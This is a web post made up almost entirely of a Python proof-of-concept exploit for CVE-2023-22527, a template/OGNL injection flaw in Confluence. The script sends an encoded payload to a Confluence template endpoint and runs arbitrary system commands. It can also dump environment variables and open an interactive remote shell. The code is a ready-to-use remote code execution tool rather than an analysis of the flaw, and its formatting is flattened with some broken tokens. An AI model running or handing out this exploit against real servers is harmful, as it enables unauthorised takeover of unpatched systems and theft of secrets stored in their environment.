POC for CVE-2023-22527 (Confluence SSTI) - Struts2

2025-03-01T14:28:58.163245+00:00

~~~python import requests import argparse class exploit: def __init__(self, url): self.url = url def rce(self, cmd='', header='Ret-rce'): data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameter s.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"'+cmd+'"}))\r\ n' r = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = { 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': str(len(data)) } ) return r.text.split('')[0].strip() def get_env(self): return self.rce(cmd='env') def shell(self): print('[DEBUG] Spawning semi-interactive shell ..') while 1: cmd = input('$ ') result = self.rce(cmd) print(result) def parse_args(): parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)') parser.add_argument("-u",dest="url",type=str,required=False, help="Url") parser.add_argument("-c",dest="command",type=str,required=False, default=None,help="Command") parser.add_argument("-e",dest="env",action="store_true",required=False,default=False, help="Get environnement vars") parser.add_argument("-i",dest="interactive",action="store_true",required=False,default=False, help="Interactive mod") return parser.parse_args() def main(args): if args.command is None and not args.env and not args.interactive: print('[ERROR] Please provide a command using -c option') exp = exploit(url = args.url) if args.env: res = exp.get_env() print(res) if args.command: res = exp.rce(args.command) print(res) if args.interactive: exp.shell() if __name__ == '__main__': args = parse_args() main(args = args) ~~~

Most recent comment.

POC for CVE-2023-22527 (Confluence SSTI) - Struts2